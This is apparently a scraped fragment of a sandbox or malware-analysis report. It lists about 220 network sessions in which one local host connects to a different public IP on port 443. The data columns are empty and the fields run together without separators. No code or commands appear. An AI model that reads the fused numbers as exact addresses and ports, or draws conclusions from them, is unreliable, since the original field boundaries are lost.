                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17285192.168.2.2350876173.106.200.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17286192.168.2.23388008.35.132.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17287192.168.2.2343230177.241.155.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17288192.168.2.234053265.47.132.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17289192.168.2.2345200171.144.9.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17290192.168.2.2360326169.97.3.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17291192.168.2.2348288134.121.24.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17292192.168.2.2349338112.28.59.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17293192.168.2.234944620.29.9.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17294192.168.2.2354870119.58.53.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17295192.168.2.235011020.58.32.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17296192.168.2.2343906185.145.145.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17297192.168.2.2340242200.50.42.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17298192.168.2.2356280201.65.223.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17299192.168.2.2345452109.221.93.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17300192.168.2.235409676.30.18.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17301192.168.2.2353706120.41.196.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17302192.168.2.234197218.83.220.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17303192.168.2.2356922130.29.122.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17304192.168.2.23561829.186.224.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17305192.168.2.2334734124.226.206.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17306192.168.2.2346232103.207.116.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17307192.168.2.2360848171.67.221.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17308192.168.2.2360434218.101.106.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17309192.168.2.2346866132.142.63.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17310192.168.2.23389704.172.199.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17311192.168.2.2351302139.75.74.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17312192.168.2.2338060180.142.206.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17313192.168.2.234657673.175.126.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17314192.168.2.2358138173.154.1.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17315192.168.2.2337578123.136.75.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17316192.168.2.2350292160.60.16.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17317192.168.2.233757044.204.62.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17318192.168.2.234458678.128.122.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17319192.168.2.233407264.117.51.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17320192.168.2.2336864217.249.251.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17321192.168.2.2337166162.149.6.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17322192.168.2.2346844156.128.182.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17323192.168.2.2333864169.212.235.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17324192.168.2.235249279.158.241.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17325192.168.2.234661870.120.158.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17326192.168.2.234392473.122.128.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17327192.168.2.234470495.57.112.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17328192.168.2.233738087.146.124.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17329192.168.2.234264813.222.237.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17330192.168.2.23336828.198.191.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17331192.168.2.2358782219.232.63.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17332192.168.2.2345522160.187.192.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17333192.168.2.2350756152.174.247.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17334192.168.2.2338868206.191.213.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17335192.168.2.2338578202.56.55.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17336192.168.2.234817846.207.186.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17337192.168.2.234697069.21.96.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17338192.168.2.2354698176.150.102.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17339192.168.2.2354264137.99.102.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17340192.168.2.233820870.143.222.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17341192.168.2.234861483.34.251.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17342192.168.2.2346294105.124.216.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17343192.168.2.2346332152.38.25.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17344192.168.2.235830289.202.203.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17345192.168.2.2334236119.247.253.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17346192.168.2.235014296.105.71.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17347192.168.2.234856052.162.194.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17348192.168.2.233589678.12.106.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17349192.168.2.2333016210.255.14.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17350192.168.2.235943217.85.242.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17351192.168.2.2360898144.130.67.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17352192.168.2.2355164123.189.135.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17353192.168.2.234607095.97.149.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17354192.168.2.2344494178.82.68.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17355192.168.2.235352461.78.224.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17356192.168.2.2339260176.149.84.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17357192.168.2.235745817.174.29.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17358192.168.2.234048235.1.111.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17359192.168.2.2343132177.255.94.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17360192.168.2.2344032160.115.20.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17361192.168.2.233989489.91.5.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17362192.168.2.234160471.5.22.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17363192.168.2.2343522189.101.196.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17364192.168.2.233639427.178.39.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17365192.168.2.2356480139.249.17.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17366192.168.2.2350018196.225.20.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17367192.168.2.234553494.21.65.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17368192.168.2.2353876113.94.91.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17369192.168.2.2345192220.2.177.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17370192.168.2.234458014.60.174.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17371192.168.2.2346464161.43.91.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17372192.168.2.2353864163.232.114.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17373192.168.2.2353478102.39.219.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17374192.168.2.235967220.168.181.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17375192.168.2.234914657.243.233.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17376192.168.2.235626819.246.65.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17377192.168.2.2341964191.67.136.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17378192.168.2.2347984150.109.54.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17379192.168.2.23371689.15.202.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17380192.168.2.234781683.134.185.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17381192.168.2.2353606109.227.57.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17382192.168.2.2343780144.226.162.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17383192.168.2.2352092137.220.34.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17384192.168.2.2360138147.192.61.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17385192.168.2.2359328171.142.112.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17386192.168.2.2335300219.178.174.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17387192.168.2.233822066.251.245.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17388192.168.2.233529049.85.99.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17389192.168.2.235028819.203.132.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17390192.168.2.2353620209.169.7.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17391192.168.2.233523619.52.96.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17392192.168.2.2345374194.11.156.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17393192.168.2.2336302162.93.230.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17394192.168.2.2336432167.252.33.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17395192.168.2.234432024.91.123.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17396192.168.2.235068246.182.56.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17397192.168.2.234758425.19.161.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17398192.168.2.2342256195.34.246.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17399192.168.2.235999486.191.147.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17400192.168.2.2337398223.138.142.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17401192.168.2.2356090211.203.88.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17402192.168.2.2350982172.181.24.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17403192.168.2.2335262186.162.108.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17404192.168.2.235803627.157.52.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17405192.168.2.2358560220.184.74.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17406192.168.2.234494447.139.148.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17407192.168.2.235829871.235.251.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17408192.168.2.2347604220.145.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17409192.168.2.234164658.52.72.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17410192.168.2.2360122180.73.247.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17411192.168.2.2360832195.56.6.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17412192.168.2.234575692.13.156.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17413192.168.2.235420673.80.166.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17414192.168.2.235173234.85.239.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17415192.168.2.2337006189.44.0.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17416192.168.2.2351734212.137.201.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17417192.168.2.234054839.242.59.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17418192.168.2.233506893.253.247.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17419192.168.2.235721066.37.79.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17420192.168.2.234264296.66.193.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17421192.168.2.2350978204.74.16.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17422192.168.2.2358826207.168.42.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17423192.168.2.235760632.162.59.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17424192.168.2.2359520202.144.37.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17425192.168.2.2358304128.36.206.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17426192.168.2.235010648.6.136.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17427192.168.2.2354052190.70.131.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17428192.168.2.2335546118.97.201.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17429192.168.2.2349988213.180.24.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17430192.168.2.2352184142.200.81.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17431192.168.2.2350560165.65.113.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17432192.168.2.2333684164.96.119.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17433192.168.2.2333364220.44.137.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17434192.168.2.235396827.74.35.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17435192.168.2.235020859.231.147.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17436192.168.2.2333474181.34.192.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17437192.168.2.2359104121.155.213.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17438192.168.2.2347020219.201.213.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17439192.168.2.234713647.240.108.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17440192.168.2.236023475.11.143.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17441192.168.2.2358954221.216.140.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17442192.168.2.233935488.254.202.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17443192.168.2.235758264.47.0.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17444192.168.2.235077657.53.203.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17445192.168.2.235290423.7.159.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17446192.168.2.2346094137.61.86.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17447192.168.2.2345750172.83.127.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17448192.168.2.233883832.222.183.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17449192.168.2.235279050.134.44.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17450192.168.2.2346654169.75.111.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17451192.168.2.2344722189.187.67.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17452192.168.2.235830861.97.112.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17453192.168.2.2358280113.235.241.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17454192.168.2.2359940166.95.26.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17455192.168.2.2354562159.103.108.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17456192.168.2.235104846.187.82.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17457192.168.2.235457087.179.231.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17458192.168.2.2359876155.54.240.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17459192.168.2.2332992114.251.30.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17460192.168.2.234417036.231.221.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17461192.168.2.235643457.87.84.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17462192.168.2.234997283.208.90.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17463192.168.2.233436885.51.26.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17464192.168.2.2342602161.125.238.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17465192.168.2.2335970160.62.84.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17466192.168.2.234982861.197.134.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17467192.168.2.2340858109.107.17.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17468192.168.2.2350660135.102.189.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17469192.168.2.2335030112.241.86.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17470192.168.2.23579181.168.30.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17471192.168.2.2339006145.3.249.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17472192.168.2.2347016172.136.174.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17473192.168.2.2345876146.164.246.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17474192.168.2.2339564173.101.9.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17475192.168.2.2342290103.132.173.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17476192.168.2.234391861.119.118.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17477192.168.2.2339676198.152.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17478192.168.2.235148832.13.120.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17479192.168.2.2347268209.98.44.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17480192.168.2.2341644118.17.65.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17481192.168.2.2340146178.195.129.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17482192.168.2.235269289.67.211.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17483192.168.2.2346118188.162.234.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17484192.168.2.2337948130.80.201.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17485192.168.2.234812641.82.147.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17486192.168.2.23443149.116.241.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17487192.168.2.23480521.207.48.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17488192.168.2.234713272.122.241.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17489192.168.2.2338002187.206.250.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17490192.168.2.2342486105.142.157.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17491192.168.2.2344330169.120.159.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17492192.168.2.2353126217.4.196.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17493192.168.2.2339674193.91.182.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17494192.168.2.2343734114.228.73.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17495192.168.2.2346756109.183.92.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17496192.168.2.2334378150.223.220.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17497192.168.2.2357924110.55.207.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17498192.168.2.23348449.225.244.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17499192.168.2.2356262162.81.146.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17500192.168.2.235027490.237.184.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17501192.168.2.2352204202.194.129.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17502192.168.2.234453274.121.126.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17503192.168.2.235658096.71.223.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17504192.168.2.233692279.130.182.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17505192.168.2.2359660170.212.54.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
